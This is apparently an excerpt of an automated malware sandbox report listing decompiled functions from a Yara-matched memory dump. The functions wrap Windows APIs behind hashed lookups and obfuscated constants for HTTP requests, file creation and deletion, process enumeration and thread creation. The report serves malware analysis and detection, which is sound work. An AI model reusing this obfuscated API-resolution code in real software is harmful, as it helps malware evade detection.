                                              • InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000), ref: 00227A07
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ConnectInternet
                                              • String ID:
                                              • API String ID: 3050416762-0
                                              • Opcode ID: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
                                              • Instruction ID: ea7c7530376dc6d48f3345e40505da4764050cb3d86cd0bc32e0472d079ed886
                                              • Opcode Fuzzy Hash: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
                                              • Instruction Fuzzy Hash: C9212472800248BBCF119F92CD49CDFBFB9FF89718F108199F90566120D7719A60DB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 43%
                                              			E0022375D(void* __edx, WCHAR* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, DWORD* _a32, intOrPtr _a36, intOrPtr _a44, intOrPtr _a52) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				WCHAR* _v16;
                                              				WCHAR* _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				void* _t35;
                                              				int _t42;
                                              				signed int _t43;
                                              
                                              				_push(_a52);
                                              				_push(0);
                                              				_push(_a44);
                                              				_push(0);
                                              				_push(_a36);
                                              				_push(_a32);
                                              				_push(0);
                                              				_push(_a24);
                                              				_push(_a20);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(0);
                                              				_push(0);
                                              				_push(0);
                                              				E0021602B(_t35);
                                              				_v28 = 0x6b2c80;
                                              				_v24 = 0x4fb02;
                                              				_v20 = 0;
                                              				_v16 = 0;
                                              				_v8 = 0xe6a1;
                                              				_v8 = _v8 ^ 0xa0873718;
                                              				_v8 = _v8 + 0xffffab24;
                                              				_v8 = _v8 ^ 0x2595dee0;
                                              				_v8 = _v8 ^ 0x8512f71c;
                                              				_v12 = 0x8058;
                                              				_t43 = 5;
                                              				_v12 = _v12 / _t43;
                                              				_v12 = _v12 ^ 0x000051c4;
                                              				E002207A9(0xb356cba0, 0x9164b7cc, _t43, _t43, 0x178);
                                              				_t42 = GetVolumeInformationW(_a12, 0, 0, _a32, 0, 0, 0, 0); // executed
                                              				return _t42;
                                              			}













                                              APIs
                                              • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0022380A
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: InformationVolume
                                              • String ID:
                                              • API String ID: 2039140958-0
                                              • Opcode ID: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
                                              • Instruction ID: 5ee82ca949d1aee56ee8e80e297e22f81099bd8685696a5975c5e11bf8fea26e
                                              • Opcode Fuzzy Hash: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
                                              • Instruction Fuzzy Hash: 6D1117B1802219BBCF55DF95DD098DF7EB9EF49360F104048F90862160C3B14A64DBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 31%
                                              			E0021B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t32;
                                              				void* _t38;
                                              				long _t47;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a48);
                                              				_t47 = __edx;
                                              				_push(_a44);
                                              				_push(_a40);
                                              				_push(_a36);
                                              				_push(_a32);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(0);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(0);
                                              				E0021602B(_t32);
                                              				_v8 = 0xfd14;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 * 0x7a;
                                              				_v8 = _v8 >> 9;
                                              				_v8 = _v8 ^ 0x00002bef;
                                              				_v12 = 0x4f26;
                                              				_v12 = _v12 | 0xe7e97f76;
                                              				_v12 = _v12 ^ 0xe7e94dbb;
                                              				E002207A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                              				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                              				return _t38;
                                              			}









                                              APIs
                                              • CreateFileW.KERNEL32(A45C8003,?,9C67384B,00000000,0ADDA027,53345D77,00000000), ref: 0021B5FD
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
                                              • Instruction ID: 8c5b0151ff509629f37df0858bbc5671548eea907959aa7da7d1092e1be52d2d
                                              • Opcode Fuzzy Hash: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
                                              • Instruction Fuzzy Hash: 4211C372801248BBDF16DF95DD06CEE7FBAFF89314F148198FA1862120D3729A60EB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 37%
                                              			E002236D3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _v24;
                                              				intOrPtr _v28;
                                              				void* _t23;
                                              				intOrPtr* _t30;
                                              				void* _t31;
                                              				void* _t32;
                                              				signed int _t34;
                                              				void* _t41;
                                              
                                              				_t41 = __edx;
                                              				_t32 = __ecx;
                                              				E0021602B(_t23);
                                              				_v28 = 0x12ca0f;
                                              				asm("stosd");
                                              				asm("stosd");
                                              				_t34 = 0x2d;
                                              				asm("stosd");
                                              				_v8 = 0xdb27;
                                              				_v8 = _v8 >> 9;
                                              				_v8 = _v8 / _t34;
                                              				_v8 = _v8 ^ 0x000020cb;
                                              				_v12 = 0x489;
                                              				_v12 = _v12 | 0x46cddb89;
                                              				_v12 = _v12 ^ 0x46cde771;
                                              				_t30 = E002207A9(0x9dd48097, 0x9164b7cc, _t34, _t34, 0x113);
                                              				_t31 =  *_t30(_t32, _t41, __ecx, __edx, _a4, _a8); // executed
                                              				return _t31;
                                              			}














                                              APIs
                                              • ProcessIdToSessionId.KERNEL32(00000000,00000000,?,?,?,?,00000000,1B7BC3FB,?), ref: 00223754
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ProcessSession
                                              • String ID:
                                              • API String ID: 3779259828-0
                                              • Opcode ID: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
                                              • Instruction ID: 6461a1f630e964e82f15e516939f9254603a8137e89e25e376d621d476c35d7a
                                              • Opcode Fuzzy Hash: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
                                              • Instruction Fuzzy Hash: 55019675A01208FBEB04DBA9DC469DFFFB4EF44364F104059E604A7251D7755F148BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 37%
                                              			E00211132(void* __ecx, intOrPtr _a8, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, _Unknown_base(*)()* _a32) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t27;
                                              				void* _t33;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(0);
                                              				_push(_a32);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(_a20);
                                              				_push(_a16);
                                              				_push(0);
                                              				_push(_a8);
                                              				_push(0);
                                              				_push(0);
                                              				_push(__ecx);
                                              				E0021602B(_t27);
                                              				_v12 = 0xe2c5;
                                              				_v12 = _v12 * 0x1f;
                                              				_v12 = _v12 | 0x070d55ff;
                                              				_v12 = _v12 ^ 0x071f7e34;
                                              				_v8 = 0x91c3;
                                              				_v8 = _v8 + 0xffff5023;
                                              				_v8 = _v8 << 0xd;
                                              				_v8 = _v8 >> 1;
                                              				_v8 = _v8 ^ 0x7e1e17b8;
                                              				E002207A9(0x4bc4bb1d, 0x9164b7cc, __ecx, __ecx, 0x235);
                                              				_t33 = CreateThread(0, 0, _a32, _a16, 0, 0); // executed
                                              				return _t33;
                                              			}








                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 002111BA
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
                                              • Instruction ID: 4b84943b2a5f212faa2bb5f1f823e8a26441cc87cecb8c779123746be414363b
                                              • Opcode Fuzzy Hash: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
                                              • Instruction Fuzzy Hash: 09012772802229BBCF15DFE5DD49CCFBFB9EF09254F104188F90962250D2729A60DBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E00228422(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, void* _a12, long _a16, intOrPtr _a24, void* _a28) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				void* _t33;
                                              				int _t40;
                                              
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(0xffffffff);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E0021602B(_t33);
                                              				_v20 = _v20 & 0x00000000;
                                              				_v16 = _v16 & 0x00000000;
                                              				_v28 = 0x2f14d8;
                                              				_v24 = 0x27cc4d;
                                              				_v8 = 0xcfda;
                                              				_v8 = _v8 << 7;
                                              				_v8 = _v8 * 0x1b;
                                              				_v8 = _v8 ^ 0xd01d7588;
                                              				_v8 = _v8 ^ 0xdae8f2b7;
                                              				_v12 = 0x64c6;
                                              				_v12 = _v12 * 0x48;
                                              				_v12 = _v12 ^ 0x001c0252;
                                              				E002207A9(0x234ee083, 0x1f801b8, __ecx, __ecx, 0x11c);
                                              				_t40 = HttpSendRequestW(_a12, _a8, 0xffffffff, _a28, _a16); // executed
                                              				return _t40;
                                              			}












                                              APIs
                                              • HttpSendRequestW.WININET(00000000,00000000,000000FF,?,0027CC4D), ref: 002284BE
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: HttpRequestSend
                                              • String ID:
                                              • API String ID: 360639707-0
                                              • Opcode ID: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
                                              • Instruction ID: 8fd7a91687c2144d63f024c3a4b8d51662b44ae4d62efbafc4b36ad4e9d4cd61
                                              • Opcode Fuzzy Hash: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
                                              • Instruction Fuzzy Hash: 8A1116B180120DFFCF05DF94CD469EEBFB6BB44314F208288F924662A1C3768B249B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 54%
                                              			E0022981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              				void* _t28;
                                              				void* _t34;
                                              				long _t37;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a16);
                                              				_t34 = __edx;
                                              				_t37 = __ecx;
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0021602B(_t22);
                                              				_v12 = 0xe68;
                                              				_v12 = _v12 * 0x39;
                                              				_v12 = _v12 ^ 0xd1b1d871;
                                              				_v12 = _v12 ^ 0xd1b2fb7e;
                                              				_v8 = 0x629e;
                                              				_v8 = _v8 + 0xfffff5da;
                                              				_v8 = _v8 | 0xbef7b77b;
                                              				_v8 = _v8 ^ 0xbef79fc3;
                                              				E002207A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                              				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                              				return _t28;
                                              			}










                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00001000,?,?,?,002187F2,0000CAAE,0000510C,AD82F196), ref: 0022989B
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
                                              • Instruction ID: 136ff4b73406eac4840e75f5a7c5c464a2f8124889a7d21b5cd232603915ad96
                                              • Opcode Fuzzy Hash: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
                                              • Instruction Fuzzy Hash: C2014876801208BBDB04EFD5D8468DFBFB9EF85750F108199F918A6220E6715A619BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 76%
                                              			E00229AC7(void* __ecx, void* __edx, struct tagPROCESSENTRY32W _a4, intOrPtr _a8, void* _a12) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t26;
                                              				int _t33;
                                              				signed int _t35;
                                              
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				E0021602B(_t26);
                                              				_v12 = 0x3a37;
                                              				_t35 = 0x5f;
                                              				_v12 = _v12 / _t35;
                                              				_v12 = _v12 << 3;
                                              				_v12 = _v12 ^ 0x0000271a;
                                              				_v8 = 0x41ad;
                                              				_v8 = _v8 ^ 0xae17da57;
                                              				_v8 = _v8 + 0xffff40f3;
                                              				_v8 = _v8 ^ 0xae16a338;
                                              				E002207A9(0xfb40698d, 0x9164b7cc, _t35, _t35, 0x16d);
                                              				_t33 = Process32NextW(_a12, _a4); // executed
                                              				return _t33;
                                              			}









                                              APIs
                                              • Process32NextW.KERNEL32(DDC40DBA,0000271A), ref: 00229B3F
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: NextProcess32
                                              • String ID:
                                              • API String ID: 1850201408-0
                                              • Opcode ID: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
                                              • Instruction ID: acaf0973c433de6aa4929ae067b49f5e7db0ae40e32cb59fb832e991e1a3cf4b
                                              • Opcode Fuzzy Hash: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
                                              • Instruction Fuzzy Hash: 05014BB1910208BFEF04DFA4CC4A8EEBFB5EF44350F108098F509A6291D7B25B609F50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E00217663(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              				intOrPtr* _t26;
                                              				void* _t27;
                                              
                                              				E0021602B(_t22);
                                              				_v12 = 0xe6d;
                                              				_v12 = _v12 | 0x830368b1;
                                              				_v12 = _v12 ^ 0x83037da7;
                                              				_v8 = 0xe4f2;
                                              				_v8 = _v8 << 0xc;
                                              				_v8 = _v8 << 5;
                                              				_v8 = _v8 ^ 0xc9e423b1;
                                              				_t26 = E002207A9(0xeb8f70d2, 0x9164b7cc, __ecx, __ecx, 0xc5);
                                              				_t27 =  *_t26(_a4, 0, _a8, _a12, __ecx, __edx, _a4, _a8, _a12, 0, _a20, __ecx, __ecx); // executed
                                              				return _t27;
                                              			}









                                              APIs
                                              • QueryFullProcessImageNameW.KERNEL32(83037DA7,00000000,?,?,?,?,?,?,0021620E,00000000,?,?), ref: 002176D5
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FullImageNameProcessQuery
                                              • String ID:
                                              • API String ID: 3578328331-0
                                              • Opcode ID: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
                                              • Instruction ID: 584d2144a991e02104d9f7f4e080d6e6e909b8f5236a56d987d45d40d94e1fcc
                                              • Opcode Fuzzy Hash: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
                                              • Instruction Fuzzy Hash: 0401467690020CBFEF059F90CC0AAAEBFB5EB44700F108188FA1426261D2B29A609B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E0022AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t21;
                                              				int _t27;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E0021602B(_t21);
                                              				_v12 = 0xcc49;
                                              				_v12 = _v12 << 6;
                                              				_v12 = _v12 >> 2;
                                              				_v12 = _v12 ^ 0x000ca988;
                                              				_v8 = 0x5d85;
                                              				_v8 = _v8 | 0xb9d19a55;
                                              				_v8 = _v8 * 0xd;
                                              				_v8 = _v8 ^ 0x6fa87272;
                                              				E002207A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                              				_t27 = DeleteFileW(_a12); // executed
                                              				return _t27;
                                              			}








                                              APIs
                                              • DeleteFileW.KERNEL32(?,?,?,?,A6E18774,?,?), ref: 0022AAA8
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
                                              • Instruction ID: bda999c00b52578895d364b87efee0fbb129f381efd7f11970989b5c23b94233
                                              • Opcode Fuzzy Hash: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
                                              • Instruction Fuzzy Hash: 92F069B191020CFFDF08DF94DD4A89EBFB4EB44304F108088F805A6250D3B69B649B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E00229A56(void* __ecx, void* __edx, intOrPtr _a4) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t18;
                                              				intOrPtr* _t22;
                                              				void* _t23;
                                              				void* _t28;
                                              				void* _t29;
                                              
                                              				_t29 = __ecx;
                                              				E0021602B(_t18);
                                              				_v12 = 0x9a38;
                                              				_v12 = _v12 >> 5;
                                              				_v12 = _v12 ^ 0x00004339;
                                              				_v8 = 0x299d;
                                              				_v8 = _v8 + 0xa1ce;
                                              				_v8 = _v8 | 0xc5f89a67;
                                              				_v8 = _v8 + 0x125d;
                                              				_v8 = _v8 ^ 0xc5f8b599;
                                              				_t22 = E002207A9(0x9f217491, 0x9164b7cc, __ecx, __ecx, 0x24e);
                                              				_t23 =  *_t22(_t29, __ecx, __edx, _a4, _t28, __ecx, __ecx); // executed
                                              				return _t23;
                                              			}











                                              APIs
                                              • GetNativeSystemInfo.KERNEL32(?), ref: 00229AC0
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: InfoNativeSystem
                                              • String ID:
                                              • API String ID: 1721193555-0
                                              • Opcode ID: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
                                              • Instruction ID: 641f0eb2095e0b7479c13652eaae4444ce77416a7398eee16f811346fa2c38cc
                                              • Opcode Fuzzy Hash: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
                                              • Instruction Fuzzy Hash: 28F037B1911218FFEB08DB94E94A8DEBAB8EF55314F108088F40466241E7B51F648BA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 70%
                                              			E00215FB2(void* __ecx, void* __edx, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t21;
                                              				int _t27;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E0021602B(_t21);
                                              				_v12 = 0x33d;
                                              				_v12 = _v12 + 0xc3dc;
                                              				_v12 = _v12 | 0x39ccfb02;
                                              				_v12 = _v12 ^ 0x39ccf342;
                                              				_v8 = 0xe8d9;
                                              				_v8 = _v8 * 0x16;
                                              				_v8 = _v8 | 0x4145347f;
                                              				_v8 = _v8 ^ 0x9035ef96;
                                              				_v8 = _v8 ^ 0xd1609914;
                                              				E002207A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                              				_t27 = CloseServiceHandle(_a4); // executed
                                              				return _t27;
                                              			}








                                              APIs
                                              • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00216025
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService
                                              • String ID:
                                              • API String ID: 1725840886-0
                                              • Opcode ID: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
                                              • Instruction ID: 5d995ea7630725837acdc99d8627ad3ff9cdb75dcbb2e3a096d8fe34c137cd10
                                              • Opcode Fuzzy Hash: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
                                              • Instruction Fuzzy Hash: C9F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F20819CE409A7260E7715F559F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions